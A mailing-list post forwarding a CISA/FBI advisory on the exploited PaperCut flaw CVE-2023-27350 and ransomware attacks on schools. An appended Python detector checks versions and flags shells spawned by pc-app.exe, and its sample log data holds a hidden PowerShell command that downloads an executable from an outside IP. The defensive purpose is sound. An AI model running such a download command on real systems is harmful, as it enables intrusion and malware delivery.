[Tech-l] Cybersecurity Advisory - PaperCut Vulnerability
Thor Sage
sage at mveca.org
Fri May 12 09:57:38 EDT 2023
Good morning,
We know that we have a number of client organizations using PaperCut. See below for important information on an exploited vulnerability in that application.
Thank you,
Thor
Thor Sage
Executive Director
Miami Valley Educational Computer Association
937-767-1468 x3101
Not-for-profit Technology Services for Education and Local Governments
From: Wood, Spencer <Spencer.Wood at cisa.dhs.gov>
Date: Friday, May 12, 2023 at 8:31 AM
To: Geoffrey Andrews <geoffrey.andrews at managementcouncil.org>, Holly.Drake at das.ohio.gov, jmccarty at oh-tech.org
Cc: kirk.herath at governor.ohio.gov, Burner, Jillian <jburner at ohiosos.gov>, Williams, Terin (She/Her/Hers) <terin.williams at cisa.dhs.gov>
Subject: CISA/FBI Cybersecurity Advisory on Actors Exploiting a Vulnerability in PaperCut
Good morning,
The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory (CSA) <https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a> about active exploitation by malicious cyber actors of a known vulnerability in print management software known as PaperCut.
* The vulnerability, CVE-2023-27350, occurs in certain versions of PaperCut. When exploited, an unauthenticated actor can execute malicious code remotely without credentials.
* In early May 2023, FBI observed a group self-identifying as the Bl00dy Ransomware Gang attempting to exploit vulnerable PaperCut servers against the Education Facilities Subsector, including K-12 schools and school districts, that were exposed over the web. Some of these operations by this gang led to data exfiltration, encryption and ransom notes left on victim systems.
* PaperCut released a patch for CVE-2023-27350 in March 2023. Users and administrators are strongly urged to immediately apply patches, and workarounds if unable to patch.
* All organizations, especially K-12 schools and school districts, are strongly encouraged to implement the recommended mitigations and use the detection methods in this advisory to reduce the likelihood and impact of a ransomware incident related to the PaperCut vulnerability and exploits by Bl00dy Ransomware Group.
The advisory can be found at: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
Technical Details
CVE-2023-27350 allows a remote actor to bypass authentication and conduct remote code execution on certain affected versions of PaperCut, a print management software.
* PaperCut servers vulnerable to CVE-2023-27350 implement improper access controls thereby allowing malicious actors to bypass user authentication and access the server as an administrator.
* When exploited, an unauthenticated actor is able to execute malicious code remotely without credentials.
* When PaperCut is exploited to execute other processes such as cmd.exe or powershell.exe, a wide range of post-exploitation activity is possible following initial access and compromise.
Education Facilities Subsector, such as educational institutions, K-12 schools and school districts, maintained approximately 68% of exposed, but not necessarily vulnerable, United States-based PaperCut servers.
* In early May 2023, the Federal Bureau of Investigation (FBI) observed the Bl00dy Ransomware Gang gain access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed over the web.
* The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files.
* FBI has observed certain command and control (C2) malware, as well as legitimate remote management and maintenance (RMM) software such as Atera, ConnectWise (formerly ScreenConnect), and Syncro downloaded onto victim systems by the ransomware gang.
If you have any questions and would like to discuss this or any other items, please feel free to contact Terin or myself.
Thank you,
Spencer
---
Spencer Wood
Cybersecurity Advisor, Region 5 (OH)
Cybersecurity and Infrastructure Security Agency
O: 202-793-4498 | M: 513-693-2792 | spencer.wood at cisa.dhs.gov
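The advisory above tells administrators to patch and to use its detection methods; the two checks below put that into runnable form. This is an added example written for this archive, not code from CISA, the FBI, MVECA or PaperCut. It assumes (a) that the CVE-2023-27350 fix releases are 20.1.7, 21.2.11 and 22.0.9 and that releases before 8.0 are out of scope, which should be confirmed against PaperCut's own bulletin, and (b) that the PaperCut application server runs on Windows as pc-app.exe, which is the parent image the "exploited to execute cmd.exe or powershell.exe" description implies. The process-creation records are constructed sample data in the shape of Windows Security Event 4688, not real telemetry.

```python
"""Added example (not code from the CISA/FBI advisory, MVECA or PaperCut):
two checks a PaperCut administrator can run on data they already have.

Assumptions made here, not stated in the advisory text above:
  * CVE-2023-27350 fix versions are 20.1.7, 21.2.11 and 22.0.9, and releases
    before 8.0 are out of scope; confirm against PaperCut's own bulletin.
  * The PaperCut application server runs on Windows as 'pc-app.exe'.
"""
import json
from typing import Dict, Iterable, List, Tuple

# --- 1. version check -------------------------------------------------------
FIXED_VERSIONS = [(20, 1, 7), (21, 2, 11), (22, 0, 9)]  # assumption, see docstring
FIRST_AFFECTED = (8, 0, 0)                               # assumption, see docstring
NEWEST_FIXED_BRANCH = 22


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '21.2.10' or '22.0.9 (Build 66387)' into a comparable (major, minor, patch)."""
    core = version.strip().split()[0] if version.strip() else ""
    nums = []
    for part in core.split(".")[:3]:
        digits = "".join(ch for ch in part if ch.isdigit())
        nums.append(int(digits) if digits else 0)
    while len(nums) < 3:
        nums.append(0)
    return nums[0], nums[1], nums[2]


def is_patched(version: str) -> bool:
    """True if this PaperCut version carries the CVE-2023-27350 fix."""
    v = parse_version(version)
    if v < FIRST_AFFECTED:
        return True
    for fixed in FIXED_VERSIONS:
        if v[0] == fixed[0]:
            return v >= fixed          # same branch: at or past the fix release
    # Branches with no fix release (e.g. 19.x) must be upgraded; branches newer
    # than the last fixed one shipped after the fix.
    return v[0] > NEWEST_FIXED_BRANCH


# --- 2. process-creation hunting -------------------------------------------
PAPERCUT_SERVER_IMAGE = "pc-app.exe"   # assumption, see docstring
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "certutil.exe"}

# Constructed sample records in the shape of Windows Security Event 4688
# (process creation), one JSON object per line. Not real telemetry.
SAMPLE_4688_LINES = r"""
{"TimeCreated": "2023-05-02T03:14:05Z", "ParentProcessName": "C:\\Windows\\System32\\services.exe", "NewProcessName": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe", "CommandLine": "pc-app.exe -service"}
{"TimeCreated": "2023-05-02T03:20:41Z", "ParentProcessName": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe", "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"}
{"TimeCreated": "2023-05-02T03:21:02Z", "ParentProcessName": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe", "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -nop -w hidden -c iwr http://198.51.100.7/a.exe -o C:\\Windows\\Temp\\a.exe"}
{"TimeCreated": "2023-05-02T08:02:13Z", "ParentProcessName": "C:\\Windows\\explorer.exe", "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"}
""".strip()


def _basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_records(text: str) -> List[Dict[str, str]]:
    """Parse newline-delimited JSON 4688-style records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_suspicious_spawns(records: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return records where the PaperCut server process started a shell or
    script host. A print server has little reason to do that; each hit is a
    lead for CVE-2023-27350 post-exploitation, not proof on its own."""
    hits = []
    for rec in records:
        parent = _basename(rec.get("ParentProcessName", ""))
        child = _basename(rec.get("NewProcessName", ""))
        if parent == PAPERCUT_SERVER_IMAGE and child in SHELL_IMAGES:
            hits.append({"time": rec.get("TimeCreated", ""),
                         "child": child,
                         "cmdline": rec.get("CommandLine", "")})
    return hits


if __name__ == "__main__":
    for ver in ("22.0.8", "22.0.9", "21.2.11", "19.2.3"):
        print(f"PaperCut {ver}: {'patched' if is_patched(ver) else 'VULNERABLE'}")
    for hit in find_suspicious_spawns(parse_records(SAMPLE_4688_LINES)):
        print(f"{hit['time']} pc-app.exe -> {hit['child']}: {hit['cmdline']}")
```

On a real server, feed parse_records() the 4688 events exported from the Security log (or equivalent Sysmon Event 1 records) and compare the version string shown in the PaperCut admin console; a hit from pc-app.exe into a shell is the point where the advisory's RMM-tool and ransomware activity would start, so treat it as an incident lead rather than a finding to close on its own.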